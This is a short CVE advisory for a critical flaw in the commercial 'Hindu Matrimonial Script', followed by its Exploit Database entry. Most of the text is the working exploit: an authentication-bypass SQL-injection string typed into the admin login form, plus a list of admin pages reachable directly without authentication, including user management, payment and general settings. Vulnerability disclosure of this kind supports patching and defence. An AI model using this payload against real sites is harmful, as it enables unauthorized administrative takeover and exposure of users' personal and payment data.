Headline
CVE-2017-20080: Offensive Security’s Exploit Database Archive
A vulnerability, which was classified as critical, has been found in Hindu Matrimonial Script. Affected by this issue is some unknown functionality of the file /admin/googleads.php. The manipulation leads to improper privilege management. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
# # # # #
# Vulnerability:: Admin Login Bypass & SQLi + Add/Edit
# Date: 13.01.2017
# Vendor Homepage: http://www.phpmatrimonialscript.in/
# Script Name: Hindu Matrimonial Script
# Script Buy Now: http://www.phpmatrimonialscript.in/product/hindu-matrimonial-script/
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
#
# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
#
# Direct entrance Add/Edit...
# http://localhost/[PATH]/admin/usermanagement.php
# http://localhost/[PATH]/admin/countrymanagement.php
# http://localhost/[PATH]/admin/communitymanagement.php
# http://localhost/[PATH]/admin/renewaldue.php
# http://localhost/[PATH]/admin/generalsettings.php
# http://localhost/[PATH]/admin/cms.php
# http://localhost/[PATH]/admin/cms.php
# http://localhost/[PATH]/admin/newsletter1.php
# http://localhost/[PATH]/admin/payment.php
# http://localhost/[PATH]/admin/searchview.php
# http://localhost/[PATH]/admin/success_story.php
# http://localhost/[PATH]/admin/featured.php
# http://localhost/[PATH]/admin/photo.php
# http://localhost/[PATH]/admin/googleads.php
# http://localhost/[PATH]/admin/reports.php
# # # # #